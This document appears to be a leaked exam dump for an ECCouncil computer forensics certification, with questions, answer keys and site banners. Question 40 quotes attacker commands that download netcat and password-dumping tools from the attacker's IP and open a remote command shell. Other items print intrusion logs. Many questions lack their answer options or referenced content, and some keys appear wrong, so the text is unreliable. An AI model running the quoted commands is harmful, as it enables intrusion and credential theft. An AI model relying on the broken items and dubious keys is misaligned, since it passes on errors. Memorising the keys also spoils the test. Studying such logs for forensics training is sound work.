ECCouncil - Premium.312 49.by - Vceplus.197q
ECCouncil - Premium.312 49.by - Vceplus.197q
ECCouncil - Premium.312 49.by - Vceplus.197q
316q
Number: 312-49
Passing Score: 800
Time Limit: 120 min
File Version: 1.7
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Exam A
QUESTION 1
When an investigator contacts by telephone the domain administrator or controller listed by a Who is lookup to request all e-mails sent and received for a user
account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 2
Item 2If you come across a sheepdip machine at your client site, what would you infer?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 3
In a computer forensics investigation, what describes the route that evidence takes from the time you find it until the case is closed or goes to court?
A. rules of evidence
B. law of probability
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
C. chain of custody
D. policy of separation
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 4
How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?
A. 128
B. 64
C. 32
D. 16
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 5
You are working on a thesis for your doctorate degree in Computer Science. Your thesis is based on HTML, DHTML, and other web-based languages and how
they have evolved over the years.
You navigate to archive. org and view the HTML code of news.com. You then navigate to the current news.com website and copy over the source code. While
searching through the code, you come across something abnormal: What have you found?
A. Web bug
B. CGI code
C. Trojan.downloader
D. Blind bug
Correct Answer: A
Section: (none)
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation
Explanation/Reference:
QUESTION 6
You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is 1709 on the primary hard drive. Which of the following formats
correctly specifies these sectors?
A. 0:1000, 150
B. 0:1709, 150
C. 1:1709, 150
D. 0:1709-1858
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 7
A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is an excerpt from a Snort binary capture of the attack. Decipher
the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt.
(Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet
signatures from a sniff dump.) 03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111
TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111
UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84
Len: 64
01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773
UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Len: 1084
47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 8
The newer Macintosh Operating System is based on:
A. OS/2
B. BSD Unix
C. Linux
D. Microsoft Windows
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 9
Before you are called to testify as an expert, what must an attorney do first?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 10
You are contracted to work as a computer forensics investigator for a regional bank that has four 30 TB storage area networks that store customer data.
What method would be most efficient for you to acquire digital evidence from this network?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 11
You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly
stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the
investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own
designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as
that of the company with only the wording in the graphic being different. What area of the law is the employee violating?
A. trademark law
B. copyright law
C. printright law
D. brandmark law
Correct Answer: A
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 12
What file structure database would you expect to find on floppy disks?
A. NTFS
B. FAT32
C. FAT16
D. FAT12
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 13
What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so
that all the hosts behind the router are effectively disabled?
A. digital attack
B. denial of service
C. physical attack
D. ARP redirect
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 14
When examining a file with a Hex Editor, what space does the file header occupy?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
B. the first several bytes of the file
C. none, file headers are contained in the FAT
D. one byte at the beginning of the file
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 15
In the context of file deletion process, which of the following statement holds true?
A. When files are deleted, the data is overwritten and the cluster marked as available
B. The longer a disk is in use, the less likely it is that deleted files will be overwritten
C. While booting, the machine may create temporary files that can delete evidence
D. Secure delete programs work by completely overwriting the file in one go
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 16
A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to
demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has
removed any images he might have downloaded. What can the investigator do to prove the violation?
Correct Answer: A
Section: (none)
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation
Explanation/Reference:
QUESTION 17
A(n) _____________________ is one that's performed by a computer program rather than the attacker manually performing the steps in the attack sequence.
A. blackout attack
B. automated attack
C. distributed attack
D. central processing attack
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 18
The offset in a hexadecimal code is:
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 19
It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics examiner?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. by law, three
B. quite a few
C. only one
D. at least two
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 20
With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.
A. 0
B. 10
C. 100
D. 1
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 21
When examining the log files from a Windows IIS Web Server, how often is a new log file created?
Correct Answer: A
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 22
Which part of the Windows Registry contains the user's password file?
A. HKEY_LOCAL_MACHINE
B. HKEY_CURRENT_CONFIGURATION
C. HKEY_USER
D. HKEY_CURRENT_USER
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 23
An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video discs (DVDs) by using a large magnet. You inform him
that this method will not be effective in wiping out the data because CDs and DVDs are ______________ media used to store large amounts of data and are not
affected by the magnet.
A. logical
B. anti-magnetic
C. magnetic
D. optical
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 24
Lance wants to place a honeypot on his network. Which of the following would be your recommendations?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. Use a system that has a dynamic addressing on the network
B. Use a system that is not directly interacting with the router
C. Use it on a system in an external DMZ in front of the firewall
D. It doesn't matter as all replies are faked
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 25
What does the acronym POST mean as it relates to a PC?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 26
Which legal document allows law enforcement to search an office, place of business, or other locale for evidence relating to an alleged crime?
A. bench warrant
B. wire tap
C. subpoena
D. search warrant
Correct Answer: D
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 27
You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that
are part of an ongoing investigation.
Your job is to complete the required evidence custody forms to properly document each piece of evidence as it is collected by other members of your team. Your
manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to
help preserve the chain of custody of the case?
A. All forms should be placed in an approved secure container because they are now primary evidence in the case.
B. The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure
container.
C. The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report
file.
D. All forms should be placed in the report file because they are now primary evidence in the case.
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 28
The MD5 program is used to:
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 29
Which is a standard procedure to perform during all computer forensics investigations?
A. with the hard drive removed from the suspect PC, check the date and time in the system's CMOS
B. with the hard drive in the suspect PC, check the date and time in the File Allocation Table
C. with the hard drive removed from the suspect PC, check the date and time in the system's RAM
D. with the hard drive in the suspect PC, check the date and time in the system's CMOS
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 30
E-mail logs contain which of the following information to help you in your investigation? (Choose four.)
Explanation/Reference:
QUESTION 31
In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
D. one who has lots of allocation units per block or cluster
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 32
In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?
A. evidence must be handled in the same way regardless of the type of case
B. evidence procedures are not important unless you work for a law enforcement agency
C. evidence in a criminal case must be secured more tightly than in a civil case
D. evidence in a civil case must be secured more tightly than in a criminal case
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 33
You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every
applicable procedure, however your boss is still concerned that the defense attorney might question-whether evidence has been changed while at the lab. What
can you do to prove that the evidence is the same as it was when it first entered the lab?
A. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab
B. make an MD5 hash of the evidence and compare it to the standard database developed by NIST
C. there is no reason to worry about this possible claim because state labs are certified
D. sign a statement attesting that the evidence is the same as it was when it entered the lab
Correct Answer: A
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 34
Study the log given below and answer the following question:
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 35
When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized
time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to
determine exactly when specific events took place, and how events interlace. What is the name of the service used to synchronize time among multiple
computers?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. Universal Time Set
B. Network Time Protocol
C. SyncTime Service
D. Time-Sync Protocol
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 36
When investigating a potential e-mail crime, what is your first step in the investigation?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 37
If a suspect computer is located in an area that may have toxic chemicals, you must:
Correct Answer: A
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 38
The following excerpt is taken from a honeypot log. The log captures activities across three days.
There are several intrusion attempts; however, a few are successful.
(Note: The objective of this question-is to test whether the student can read basic information from log entries and interpret the nature of attack.)
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 ->
172.16.1.107:53
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 39
What happens when a file is deleted by a Microsoft operating system using the FAT file system?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. only the reference to the file is removed from the FAT
B. the file is erased and cannot be recovered
C. a copy of the file is stored and the original file is erased
D. the file is erased but can be recovered
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 40
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File
Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The
attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell
commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is
functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
Correct Answer: C
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.
QUESTION 41
What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the
casual observer?
A. rootkit
B. key escrow
C. steganography
D. Offset
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 42
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased
opinion and be objective in your entire fact finding process. Therefore, you report this evidence. This type of evidence is known as:
A. Inculpatory evidence
B. Mandatory evidence
C. Exculpatory evidence
D. Terrible evidence
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 43
If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector investigation and should be referred to law enforcement?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. true
B. false
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 44
What binary coding is used most often for e-mail purposes?
A. MIME
B. Uuencode
C. IMAP
D. SMTP
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 45
If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?
Correct Answer: D
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
Section: (none)
Explanation
QUESTION 46
From the following spam mail header, identify the host IP that sent this spam?
From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk
(8.11.6/8.11.6) with ESMTP id
fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1)
with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk From: "china hotel web"
To: "Shlam"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE
Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0
X-Priority: 3 X-MSMail-
Priority: Normal
Reply-To: "china hotel web"
A. 137.189.96.52
B. 8.12.1.0
C. 203.218.39.20
D. 203.218.39.50
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 47
If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by
booting to the hard drive.
A. deltree command
B. CMOS
C. Boot.sys
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
D. Scandisk utility
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 48
You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics
lab. How many law-enforcement computer investigators should you request to staff the lab?
A. 8
B. 1
C. 4
D. 2
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 49
When obtaining a warrant, it is important to:
A. particularlydescribe the place to be searched and particularly describe the items to be seized
B. generallydescribe the place to be searched and particularly describe the items to be seized
C. generallydescribe the place to be searched and generally describe the items to be seized
D. particularlydescribe the place to be searched and generally describe the items to be seized
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 50
What does the superblock in Linux define?
A. filesynames
B. diskgeometr
C. location of the firstinode
D. available space
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 51
Diskcopy is:
A. a utility by AccessData
B. a standard MS-DOS command
C. Digital Intelligence utility
D. dd copying tool
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
Explanation: diskcopy is a STANDARD DOS utility. C:\WINDOWS>diskcopy /? Copies the contents of one floppy disk to another.
QUESTION 52
Sectors in hard disks typically contain how many bytes?
A. 256
B. 512
C. 1024
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
D. 2048
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 53
Area density refers to:
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 54
Corporate investigations are typically easier than public investigations because:
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 55
Which of the following should a computer forensics lab used for investigations have?
A. isolation
B. restricted access
C. open access
D. an entry log
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 56
Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the
customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the
competitors. Jason wants to report this crime to the law enforcement agencies immediately.
Which organization coordinates computer crimes investigations throughout the United States?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 57
Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
B. host-based IDS systems (HIDS)
C. anomaly detection
D. signature recognition
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 58
You should make at least how many bit-stream copies of a suspect drive?
A. 1
B. 2
C. 3
D. 4
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 59
Why should you note all cable connections for a computer you want to seize as evidence?
Correct Answer: A
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 60
What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 61
What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 sever the course of its lifetime?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 62
Which response organization tracks hoaxes as well as viruses?
A. NIPC
B. FEDCIRC
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
C. CERT
D. CIAC
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 63
Which federal computer crime law specifically refers to fraud and related activity in connection with access devices like routers?
A. 18 U.S.C. 1029
B. 18 U.S.C. 1362
C. 18 U.S.C. 2511
D. 18 U.S.C. 2703
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 64
Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the MAC, or unique identifier, of the machine that created the document. What
is that code called?
Correct Answer: C
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 65
What TCP/UDP port does the toolkit program netstat use?
A. Port 7
B. Port 15
C. Port 23
D. Port 69
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 66
Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 67
In a FAT32 system, a 123 KB file will use how many sectors?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. 34
B. 25
C. 11
D. 56
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 68
You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been
committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target
computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?
A. The registry
B. The swap file
C. The recycle bin
D. The metadata
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 69
When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?
A. a write-blocker
B. a protocol analyzer
C. a firewall
D. a disk editor
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 70
How many sectors will a 125 KB file use in a FAT32 file system?
A. 32
B. 16
C. 256
D. 25
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 71
You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published?
A. 70 years
B. the life of the author
C. the life of the author plus 70 years
D. copyrights last forever
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 72
When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
address at a specific time?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 73
Bob has been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use
the System for a period of three weeks. However, law enforcement agencies were recoding his every activity and this was later presented as evidence.
The organization had used a Virtual Environment to trap Bob. What is a Virtual Environment?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 74
To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What
group is actively providing tools and creating procedures for testing and validating computer forensics software?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
D. Society for Valid Forensics Tools and Testing (SVFTT)
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 75
With Regard to using an Antivirus scanner during a computer forensics investigation, You should:
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 76
Windows identifies which application to open a file with by examining which of the following?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 77
You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What
argument could the defense make to weaken your case?
A. The tool hasn't been tested by the International Standards Organization (ISO)
B. Only the local law enforcement should use the tool
C. The total has not been reviewed and accepted by your peers
D. You are not certified for using the tool
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 78
Which of the following is NOT a graphics file?
A. Picture1.tga
B. Picture2.bmp
C. Picture3.nfo
D. Picture4.psd
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 79
When conducting computer forensic analysis, you must guard against ______________ So that you remain focused on the primary job and insure that the level
of work does not increase beyond what was originally expected.
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
C. Unauthorized expenses
D. Overzealous marketing
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 80
In General, __________________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific
methods to retrieve the data.
A. Network Forensics
B. Data Recovery
C. Disaster Recovery
D. Computer Forensics
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 81
When you carve an image, recovering the image depends on which of the following skills?
Correct Answer: A
Section: (none)
Explanation
